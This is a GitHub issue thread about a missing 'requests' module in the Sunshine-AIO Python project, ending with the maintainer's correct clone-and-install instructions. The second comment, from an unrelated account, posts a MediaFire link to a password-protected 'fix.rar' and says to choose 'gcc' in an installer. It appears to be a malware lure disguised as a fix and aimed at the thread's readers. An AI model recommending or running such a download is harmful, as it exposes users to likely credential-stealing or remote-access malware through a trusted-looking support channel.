### ISSUE TITLE
Cannot run 

### ISSUE THREAD

**Issue by DatUub** [LeGeRyChEeSe/Sunshine-AIO#8]
No module named 'Requests'

PS C:\Users\ari\Desktop\sunshine\Sunshine-AIO> virtualenv-python-sunshine-aio\Scripts\python.exe src\main.py
Traceback (most recent call last):
  File "C:\Users\ari\Desktop\sunshine\Sunshine-AIO\src\main.py", line 1, in <module>
    from functions import *
  File "C:\Users\ari\Desktop\sunshine\Sunshine-AIO\src\functions.py", line 4, in <module>
    import requests
ModuleNotFoundError: No module named 'requests'
PS C:\Users\ari\Desktop\sunshine\Sunshine-AIO>

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeGeRyChEeSe** [comment]
Hi, i found the issue and fixed it in the README.
- Delete the `Sunshine-AIO` folder
- Open a Windows Terminal in the location you want.
- Copy/Paste these commands in the Windows Terminal to download the repo:
```batch
git clone --branch dev-AIO https://github.com/LeGeRyChEeSe/Sunshine-AIO.git
cd Sunshine-AIO
py -m venv virtualenv-python-sunshine-aio
virtualenv-python-sunshine-aio\Scripts\pip.exe install -r requirements.txt

```
- Copy/Paste this command to execute the script:
```batch
virtualenv-python-sunshine-aio\Scripts\python.exe src\main.py
```
This issue should be solved now.
